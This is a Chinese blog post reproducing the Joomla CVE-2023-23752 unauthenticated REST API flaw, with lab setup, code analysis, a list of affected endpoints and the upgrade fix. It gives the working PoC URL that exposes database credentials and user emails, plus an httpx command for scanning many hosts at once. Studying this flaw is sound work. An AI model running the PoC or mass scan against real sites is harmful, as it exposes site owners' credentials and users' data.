[ 漏洞复现篇 ] Joomla未授权访问Rest API漏洞(CVE-2023-23752)

最新推荐文章于 2025-03-11 11:28:52 发布
最新推荐文章于 2025-03-11 11:28:52 发布
阅读量6.2k 收藏 12
点赞数 2
分类专栏: 轮播展示专栏 文章标签: 漏洞复现篇 Joomla未授权访问 CVE-2023-23752
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51577576/article/details/129479673
版权

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

文章目录

一、漏洞编号

CVE-2023-23752

二、漏洞简介

Joomla是一套全球知名的内容管理系统(CMS),其使用PHP语言加上MySQL数据库所开发,可以在Linux、Windows、MacOSX等各种不同的平台上运行。
在 Joomla版本为4.0.0 到 4.2.7中发现了一个漏洞(CVE-2023-23752)、可以对 web 服务端点进行未经授权访问。目前该漏洞的细节及PoC/EXP已公开。该漏洞影响较大,建议客户尽快做好自查及防护。

三、受影响版本

Joomla CMS 4.0.0 ~ 4.2.7

四、Joomla指纹信息

{	"match": "body_contains",
	"content": "content=\"joomla"},
{	"match": "body_contains",
	"content": "/media/system/js/core.js"},
{	"match": "body_contains",
	"content": "/media/system/js/mootools-core.js"}

五、环境搭建

1、下载joomla

1、上官网下载

https://www.joomlachina.cn

2、我复现的环境

https://pan.baidu.com/s/19D5apgrej4ASpTj2vXsZCw?pwd=wmzd

2、安装joomal

直接phpstudy或者wamp搭建,下载解压后放入

wamp/www/Joomla或者phpstudy/PHPTutorial/WWW/Joomla/目录下。

注意:php版本需要7.2.5以上phpstudy更新php版本
访问http://127.0.0.1/Joomla/就可以安装joomla了

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

安装完成

在这里插入图片描述

进入登陆界面

在这里插入图片描述

六、漏洞复现

1、POC

单站点检测:

/api/index.php/v1/config/application?public=true

批量检测:

httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'

2、漏洞复现

直接将POC拼接到url

http://127.0.0.1/Joomla4.2.7/api/index.php/v1/config/application?public=true
http://127.0.0.1/Joomla4.2.7/api/index.php/v1/users?public=true

3、回显出账号密码

/v1/config/application这个API用于获取网站最重要的配置信息,包含数据库的账号与密码。

在这里插入图片描述

/v1/users这个API用于获取网站用户名以及邮箱账号

在这里插入图片描述

七、漏洞分析

原文链接:https://xz.aliyun.com/t/12175#toc-4

1、Joomla简介

Joomla大致有三个路由入口,分别是
1、根目录的index.php(用户访问文章)
2、根目录的administrator/index.php(管理员管理)
3、根目录的api/index.php(开发者爱好的Rest API)
未授权的接口正是第三个入口。因此影响的只有Joomla4.0.0——Joomla4.2.7(Rest API 4.x正式开发)

2、漏洞分析

这里仅重点分析api/index.php这个路由的问题(index.php和administrator/index.php找不到漏洞)。
网站输入/api/index.php开启debug模式

在这里插入图片描述

index.php会来到app.php。其中$app主要的input成员存放所有的HTTP请求参数

在这里插入图片描述

在execute()函数中,会经过sanityCheckSystemVariables函数,此函数用来过滤渲染模板的参数,主要防止XSS漏洞。setupLogging和createExtensionNameSpaceMap主要是系统的额外记录工作。doExecute就是具体的路由逻辑函数。

在这里插入图片描述

doExecute中最重要的就是route和dispatch函数。

3、route:路由选择与鉴权

整个route函数分为两部分,路由选择和身份校验。

在这里插入图片描述

逻辑十分清晰,主要是直接通过parseApiRoute函数从请求的方法和url到$routers中找到对应的路由信息

在这里插入图片描述

身份验证的代码加上debug信息可以知道public参数控制着API是否对外开放。默认情况下是false,不对外开放。但是这里大部分情况都会选择直接下一步。但是回过头看路由获取parseApiRoute时会有新的发现

在这里插入图片描述

这里发送请求
http://x.x.x.x/api/index.php/v1/banners?public=true
再来看route变量会发现惊喜

在这里插入图片描述

此时route.var中的变量会被请求的变量覆盖。由于public=true,所以接口不需要身份验证,直接到达路由分发,也就是业务逻辑。

八、受损的API清单

由于能够直接访问API了,从中找到最终的信息即可。

/api/index.php/v1/config/application?public=true

此API用于获取网站最重要的配置信息,其中包含数据库的账号与密码。
其他受损API如下

v1/banners
v1/banners/:id
v1/banners
v1/banners/:id
v1/banners/:id
v1/banners/clients
v1/banners/clients/:id
v1/banners/clients
v1/banners/clients/:id
v1/banners/clients/:id
v1/banners/categories
v1/banners/categories/:id
v1/banners/categories
v1/banners/categories/:id
v1/banners/categories/:id
v1/banners/:id/contenthistory
v1/banners/:id/contenthistory/keep
v1/banners/:id/contenthistory
v1/config/application
v1/config/application
v1/config/:component_name
v1/config/:component_name
v1/contacts/form/:id
v1/contacts
v1/contacts/:id
v1/contacts
v1/contacts/:id
v1/contacts/:id
v1/contacts/categories
v1/contacts/categories/:id
v1/contacts/categories
v1/contacts/categories/:id
v1/contacts/categories/:id
v1/fields/contacts/contact
v1/fields/contacts/contact/:id
v1/fields/contacts/contact
v1/fields/contacts/contact/:id
v1/fields/contacts/contact/:id
v1/fields/contacts/mail
v1/fields/contacts/mail/:id
v1/fields/contacts/mail
v1/fields/contacts/mail/:id
v1/fields/contacts/mail/:id
v1/fields/contacts/categories
v1/fields/contacts/categories/:id
v1/fields/contacts/categories
v1/fields/contacts/categories/:id
v1/fields/contacts/categories/:id
v1/fields/groups/contacts/contact
v1/fields/groups/contacts/contact/:id
v1/fields/groups/contacts/contact
v1/fields/groups/contacts/contact/:id
v1/fields/groups/contacts/contact/:id
v1/fields/groups/contacts/mail
v1/fields/groups/contacts/mail/:id
v1/fields/groups/contacts/mail
v1/fields/groups/contacts/mail/:id
v1/fields/groups/contacts/mail/:id
v1/fields/groups/contacts/categories
v1/fields/groups/contacts/categories/:id
v1/fields/groups/contacts/categories
v1/fields/groups/contacts/categories/:id
v1/fields/groups/contacts/categories/:id
v1/contacts/:id/contenthistory
v1/contacts/:id/contenthistory/keep
v1/contacts/:id/contenthistory
v1/content/articles
v1/content/articles/:id
v1/content/articles
v1/content/articles/:id
v1/content/articles/:id
v1/content/categories
v1/content/categories/:id
v1/content/categories
v1/content/categories/:id
v1/content/categories/:id
v1/fields/content/articles
v1/fields/content/articles/:id
v1/fields/content/articles
v1/fields/content/articles/:id
v1/fields/content/articles/:id
v1/fields/content/categories
v1/fields/content/categories/:id
v1/fields/content/categories
v1/fields/content/categories/:id
v1/fields/content/categories/:id
v1/fields/groups/content/articles
v1/fields/groups/content/articles/:id
v1/fields/groups/content/articles
v1/fields/groups/content/articles/:id
v1/fields/groups/content/articles/:id
v1/fields/groups/content/categories
v1/fields/groups/content/categories/:id
v1/fields/groups/content/categories
v1/fields/groups/content/categories/:id
v1/fields/groups/content/categories/:id
v1/content/articles/:id/contenthistory
v1/content/articles/:id/contenthistory/keep
v1/content/articles/:id/contenthistory
v1/extensions
v1/languages/content
v1/languages/content/:id
v1/languages/content
v1/languages/content/:id
v1/languages/content/:id
v1/languages/overrides/search
v1/languages/overrides/search/cache/refresh
v1/languages/overrides/site/zh-CN
v1/languages/overrides/site/zh-CN/:id
v1/languages/overrides/site/zh-CN
v1/languages/overrides/site/zh-CN/:id
v1/languages/overrides/site/zh-CN/:id
v1/languages/overrides/administrator/zh-CN
v1/languages/overrides/administrator/zh-CN/:id
v1/languages/overrides/administrator/zh-CN
v1/languages/overrides/administrator/zh-CN/:id
v1/languages/overrides/administrator/zh-CN/:id
v1/languages/overrides/site/en-GB
v1/languages/overrides/site/en-GB/:id
v1/languages/overrides/site/en-GB
v1/languages/overrides/site/en-GB/:id
v1/languages/overrides/site/en-GB/:id
v1/languages/overrides/administrator/en-GB
v1/languages/overrides/administrator/en-GB/:id
v1/languages/overrides/administrator/en-GB
v1/languages/overrides/administrator/en-GB/:id
v1/languages/overrides/administrator/en-GB/:id
v1/languages
v1/languages
v1/media/adapters
v1/media/adapters/:id
v1/media/files
v1/media/files/:path/
v1/media/files/:path
v1/media/files
v1/media/files/:path
v1/media/files/:path
v1/menus/site
v1/menus/site/:id
v1/menus/site
v1/menus/site/:id
v1/menus/site/:id
v1/menus/administrator
v1/menus/administrator/:id
v1/menus/administrator
v1/menus/administrator/:id
v1/menus/administrator/:id
v1/menus/site/items
v1/menus/site/items/:id
v1/menus/site/items
v1/menus/site/items/:id
v1/menus/site/items/:id
v1/menus/administrator/items
v1/menus/administrator/items/:id
v1/menus/administrator/items
v1/menus/administrator/items/:id
v1/menus/administrator/items/:id
v1/menus/site/items/types
v1/menus/administrator/items/types
v1/messages
v1/messages/:id
v1/messages
v1/messages/:id
v1/messages/:id
v1/modules/types/site
v1/modules/types/administrator
v1/modules/site
v1/modules/site/:id
v1/modules/site
v1/modules/site/:id
v1/modules/site/:id
v1/modules/administrator
v1/modules/administrator/:id
v1/modules/administrator
v1/modules/administrator/:id
v1/modules/administrator/:id
v1/newsfeeds/feeds
v1/newsfeeds/feeds/:id
v1/newsfeeds/feeds
v1/newsfeeds/feeds/:id
v1/newsfeeds/feeds/:id
v1/newsfeeds/categories
v1/newsfeeds/categories/:id
v1/newsfeeds/categories
v1/newsfeeds/categories/:id
v1/newsfeeds/categories/:id
v1/plugins
v1/plugins/:id
v1/plugins/:id
v1/privacy/requests
v1/privacy/requests/:id
v1/privacy/requests/export/:id
v1/privacy/requests
v1/privacy/consents
v1/privacy/consents/:id
v1/privacy/consents/:id
v1/redirects
v1/redirects/:id
v1/redirects
v1/redirects/:id
v1/redirects/:id
v1/tags
v1/tags/:id
v1/tags
v1/tags/:id
v1/tags/:id
v1/templates/styles/site
v1/templates/styles/site/:id
v1/templates/styles/site
v1/templates/styles/site/:id
v1/templates/styles/site/:id
v1/templates/styles/administrator
v1/templates/styles/administrator/:id
v1/templates/styles/administrator
v1/templates/styles/administrator/:id
v1/templates/styles/administrator/:id
v1/users
v1/users/:id
v1/users
v1/users/:id
v1/users/:id
v1/fields/users
v1/fields/users/:id
v1/fields/users
v1/fields/users/:id
v1/fields/users/:id
v1/fields/groups/users
v1/fields/groups/users/:id
v1/fields/groups/users
v1/fields/groups/users/:id
v1/fields/groups/users/:id
v1/users/groups
v1/users/groups/:id
v1/users/groups
v1/users/groups/:id
v1/users/groups/:id
v1/users/levels
v1/users/levels/:id
v1/users/levels
v1/users/levels/:id
v1/users/levels/:id

九、漏洞修复

升级JoomlaCMS版本到 4.2.8

高级人工智能训练师.pdf
06-24
高级人工智能训练师.pdf
阿里巴巴达摩院人工智能训练师高级
huang0612123的博客
02-19 8865
阿里巴巴达摩院人工智能训练师高级
干货!工信部X百度 “生成式人工智能应用工程师(高级)”真题分享
atbigapp的博客
03-11 1514
该认证精准对接《生成式人工智能服务管理暂行办法》要求,以百度飞桨文心大模型为技术底座,培养使用大模型进行智能创作的技术人员,培养其基于算法、模型规则生成文本、图片、声音、视频、代码等内容优化提示词,通过调用、微调,将生成式人工智能应用到各类场景中的能力。随着生成式AI技术的快速发展,这一职业已成为AI领域的热门方向,生成式人工智能应用工程师也一定会越来越吃香。个人觉得考试的整体难度还是较大的,主要是考试时间为2小时,题目量比较大实操题部分读题以及答题需要打字整体比较耗时。了解更多关于提示词开发创作。
初级人工智能训练师考试答案补充版.pdf
04-08
初级人工智能训练师考试答案补充版.pdf初级人工智能训练师考试答案补充版.pdf初级人工智能训练师考试答案补充版.pdf初级人工智能训练师考试答案补充版.pdf初级人工智能训练师考试答案补充版.pdf初级人工智能训练师考试答案补充版.pdf
人工智能复习试题和答案及解析.pdf
05-29
人工智能复习试题和答案及解析.pdf人工智能复习试题和答案及解析.pdf人工智能复习试题和答案及解析.pdf人工智能复习试题和答案及解析.pdf人工智能复习试题和答案及解析.pdf人工智能复习试题和答案及解析.pdf人工智能复习试题和答案及解析.pdf人工智能复习试题和答案及解析.pdf
人工智能笔试题目及参考答案
03-22
本次人工智能笔试题目及参考答案总有74页,每道题后面都有该题的解析参考答案
人工智能训练师 综合测试题库
Bowen_CV的博客
11-17 1987
在机器学习中,如果单纯去提高训练数据的预测能力,所选模型的复杂度往往会很高,这种现象称为过拟合。深度学习通过深度神经网的多层处理,将初始的"低层"特征表示转化为°高层"特征表示,用"简单模型°即可完成复杂的分类等学习任务。当你在转录答案的时候,答案为图案的题目需要先在本文档中寻找特殊字符,倘若没有则需要单独拉框答案。机器学习从不同的角度,有不同的分类方式,以下哪项不属于按系统学习能力分类的类别()。物联网为人工智能()提供了基础设施环境,同时带来了多维度、及时全面的海量训练数据。
人工智能训练师_练习题汇总
Bowen_CV的博客
01-07 1551
人脸解析,是将人的头部包含人脸五官构成进行分解,得到头发、面部皮肤、眼睛、眉毛、人脸解析,是将人的头部包含人脸五官构成进行分解,得到头发、面部皮肤、眼睛、眉毛、人脸解析,是将人的头部包含人脸五官构成进行分解,得到头发、面部皮肤、眼睛、眉毛、人工智能领域通常所指的模式识别主要是对语音波形、地震波、心电图、脑电图、图片、机器学习是一门多领域交叉学科,涉及概率论、统计学、逼近论、凸分析、算法复杂度等。这项功能可以通过调整。论、机械电子、计算机、材料、仿生等学科,在工业、医学、农业、建筑业甚至军事等领域。
Y小蜜人工智能训练师题目
07-04
这是在进行Y小蜜认证考试的时候遇到的问题整理下来的常考知识,大部分题目,过关宝典,93分题目。不用看ppt或视频,背熟即可。
人工智能考试试题及答案
01-25
西北农林科技大学 人工智能课程考试试卷及答案一套
同学】互联网农旅电商(高级答案及解析
香芋芋圆的博客
04-07 1709
初级答案见。
表示学习论文分享.pptx
03-11
表示学习论文分享.pptx
云小蜜人工智能训练师ppt整理+常考知识整理(答案
09-12
阿里云--云小蜜人工智能训练师---视频ppt资源整理(方便查询)----常考知识整理(大部分题目的答案--------93分飘过
哈尔滨工业大学2019《人工智能》试题和答案.pdf
01-20
哈尔滨工业大学2019《人工智能》试题和答案
中级人工智能训练师认证题库
qq_640433727的博客
01-27 2106
2022年最新版中级人工智能训练师认证题库 作为做运营喵的你是否还在为拿不到阿里认证证书烦恼呢?小编而为你排忧解难,亲手试水的呕心整理的题库奉上, ,愿小伙伴们都能顺利拿到证书~~升职加薪,走向人生高峰! 自定义优化工作,需每周定期优化,基于不同的目的,可以划分为 智能辅助数据排名影响因素里,对于知识库配置情况中的得分较低的店铺,以下优化方法正确的是 在数据分析与优化部分,以下哪个不是训练师日常工作重事项? 在日常维护店小蜜的过程中,针对初次开启阶段,以下流程顺序哪个是正...
AIGC高频产品面试题(二)
xiongxiaoxuan的博客
07-22 1013
假设英文译为中文,英文单词数与中文字数之比为1∶1.6,在使用GPT-4的情况下,若输出1500个汉字,收0.06美元,约人民币0.432元,也就是约每千字0.36元。所以,两者的耗时比是40∶1。对于英文文本,1个token大约是4个字符或0.75个单词),GPT-4的使用费用为每1000个prompt token(用于文本生成的特定文本片段或单词)0.03美元或每1000个completion token(语言模型基于prompt token生成的完整文本)0.06美元。跨模态与多模态分别是什么?
工信教考 | AI智能体应用工程师(模拟试题)
lvaolan8888的博客
07-30 1244
关于AI智能体工程师的模拟试题,下面根据AI智能体工程师所需掌握的知识和技能,设计一些模拟题型的示例。这些题目旨在考察应试者在人工智能、机器学习、深度学习、算法设计、系统开发等方面的能力。
AIGC与传统内容创作的融合:寻找最佳平衡
AI天才研究院
02-03 1166
AIGC与传统内容创作的融合:寻找最佳平衡 关键词:AIGC、传统内容创作、融合、最佳平衡 摘要:本文深入探讨人工智能生成内容(AIGC)与传统内容创作的融合,分析二者在技术、管理、文化层面的互动与平衡。通过背景
同学智能网联车安全员高级答案
最新发布
03-29
智能网联汽车的安全员高级考试涉及多个方面的专业知识,包括但不限于自动驾驶技术原理、车辆传感器融合、网络安全防护以及法律法规等内容。以下是针对该主题的一些核心知识解析: ### 关于智能网联车安全员高级考试的核心内容 #### 1. 自动驾驶分级标准 国际自动机工程师学会(SAE International)定义了六个级别的自动驾驶等级,从L0到L5[^1]。其中,L3及以上级别需要安全员具备更高的应急处理能力。 #### 2. 车辆感知系统的组成与功能 智能网联车通常配备多种传感器,如激光雷达、毫米波雷达、摄像头和超声波传感器等。这些设备协同工作以实现环境感知、障碍物检测等功能[^2]。 #### 3. 数据通信与网络安全 智能网联车依赖V2X(Vehicle-to-Everything)技术进行数据交换,在此过程中需防范潜在的网络攻击风险,例如中间人攻击或恶意软件入侵[^3]。 #### 4. 法律法规要求 不同国家和地区对于无人驾驶测试及运营有着严格的规定,考生应熟悉当地交通法典中有关自动化驾驶部分的具体条款[^4]。 ```python # 示例代码:模拟简单决策逻辑 def decide_action(sensor_data): if sensor_data['obstacle'] and not sensor_data['emergency']: return 'slow_down' elif sensor_data['pedestrian_crossing']: return 'stop_and_yield' else: return 'continue_driving' example_input = {'obstacle': True, 'emergency': False, 'pedestrian_crossing': False} action = decide_action(example_input) print(f"Action to take: {action}") ``` 需要注意的是,“同学”作为特定平台上的学习资源名称,并不提供官方认证的标准答案集;建议通过正规渠道获取教材并参加培训课程来准备此类资格认证考试
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

寒蝉听雨[原ID_PowerShell]

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值